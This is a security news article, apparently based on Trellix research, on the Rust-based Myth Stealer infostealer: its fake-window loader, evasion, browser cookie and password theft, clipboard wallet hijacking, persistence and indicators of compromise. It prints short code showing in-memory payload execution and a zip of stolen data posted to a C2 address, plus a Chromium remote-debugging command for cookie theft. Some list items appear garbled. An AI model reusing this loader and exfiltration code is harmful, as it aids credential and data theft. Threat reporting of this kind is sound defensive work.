A new and rapidly evolving malware threat, Myth Stealer, written entirely in Rust, is actively targeting users of Chromium-based browsers including Google Chrome, Microsoft Edge, Brave, and Opera alongside Gecko-based browsers like Firefox.
Discovered by Trellix Advanced Research Center, this infostealer employs novel evasion techniques and highly modular code to steal sensitive user data, including passwords, cookies, credit card details, and more.
Originally distributed as a free trial on Telegram in late 2024, Myth Stealer has since transformed into a paid subscription service, facilitating cybercrime at scale.
Loader and Fake Window Mechanism
Upon execution, Myth Stealer displays a convincing fake window using Rust crates like native-windows-gui, egui, or native_dialog to trick users into believing a legitimate application is running.
Simultaneously, the loader decrypts the main stealer payload in memory using custom algorithms or cryptographic routines (XOR/AES, leveraging crates such as include-crypt). The decrypted payload is a 64-bit Rust DLL with key exports (DllMain and bz_internal_error), executed stealthily with the memexec crate.
Code Excerpt: Loader Decrypting and Executing DLL
rustuse include_crypt::decrypt_aes;
let encrypted_bytes = include_bytes!("stealer_payload.aes");
let key = b"supersecretkey!"; // Key is hardcoded or obfuscated
let decrypted_payload = decrypt_aes(encrypted_bytes, key);
memexec::exec(&decrypted_payload); // Execute DLL in-memory
Anti-Analysis and Obfuscation
Myth Stealer uses the obfstr crate for string obfuscation, hindering static analysis and signature-based detection. For example, strings are XOR’d and resolved at runtime via custom functions. Sandboxing checks are performed by scanning for known forensic usernames and VM-related system files. If detected, the malware self-terminates, thwarting sandbox analysis.
Obfstr Deobfuscation Workflow (Reverse Engineering)
obfstr::xref::inner.Myth Stealer targets a broad spectrum of browsers and apps:
For Chromium, it leverages the browser’s remote debugging mode to extract cookies:
textchromium.exe --remote-debugging-port=9222 --user-data-dir=<victimdir> --headless
Once privileged, it attempts to elevate using the Windows API ShellExecuteW with runas. Clipboard hijacking is also implemented to intercept and replace cryptocurrency wallet addresses in flight, redirecting funds to attacker-controlled wallets.
Data Exfiltration and Persistence
Harvested data is packed into a zip file, reversed at the byte level, and sent via HTTP POST requests to a C2 server (example: 185[.]224[.]3[.]219:8080/api/send). Each request includes custom headers (myth-key/key), further shrouding communications.
Zip File Exfiltration Logic
rustlet mut zip_file = fs::read("harvested_data.zip")?;
zip_file.reverse(); // Simple byte reversal for obfuscation
let client = reqwest::blocking::Client::new();
let res = client.post("http://185.224.3.219:8080/api/send")
.header("key", "unique-myth-key")
.body(zip_file)
.send()?;
Data points exfiltrated include:
ipify.orgThe malware maintains persistence by copying itself to AppData\Roaming\winlnk.exe and creating a .lnkk shortcut in the startup directory, registered via custom registry keys.
The developers behind Myth Stealer are running a well-organized operation, offering subscriptions via cryptocurrency and maintaining rapid update cycles to bypass antivirus solutions. Updates are announced via Telegram channels, while stolen credentials are traded in dark marketplaces.
Mitigation Recommendations:
.lnkk entries.Myth Stealer exemplifies a new wave of Rust-based malware: robust, evasive, and modular—posing a formidable challenge for defenders across the globe. As browser threats escalate, proactive threat hunting and consistent user awareness remain essential.
| SHA256 | Name |
| 1847288195fcfc03fc186bf4eead4268048ef5e082dedb963b3450ee07c23883 | loader.exe |
| 65a84024daf30c12fd2e76db661bf6e85f3da30bb3aaa7e774152855d718b0c4 | myth.exe |
| e5d09da6648add4776de8091b0182b935405791bf41476465b0e7dcb066fc0dc | myth.exe |
| f7cb6626e311181d9ded9536b1fbdf709b8254abd8d0810e04cebefea2fed131 | Mythic Guardian.exe |
| acd66cb5f1447b803245c495400ad0886352920e35defcca6c45519fb7d33693 | myth.exe |
| c7ae9d808e97fe6d6bf97aaf0775b9b6e68449f10bcc933bf07ba9d34d75a379 | Pckr.exe |
| 6c54e6648a6a33583d7707a9f7c5e83dd08ed481df6354c52e8f81e729d74a82 | Myth-Voice-Changer.exe |
| 7e2bed39eea850960a0d043e6e671154f413f5fe2cc7cafe6d92c903b3a2e8d1 | build-213.exe (free trial version) |
| b180f6f9f7eb0bb1a12a7e7c8216499366419b1083c84c4af5b0ee69b3016186 | krx ultimate crack 1.31.rar |
| 0631a62a173833c7c821989e63f77632ecce30ca5a7049db4898ff0505abf32e | Krx Clinet.exe |
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…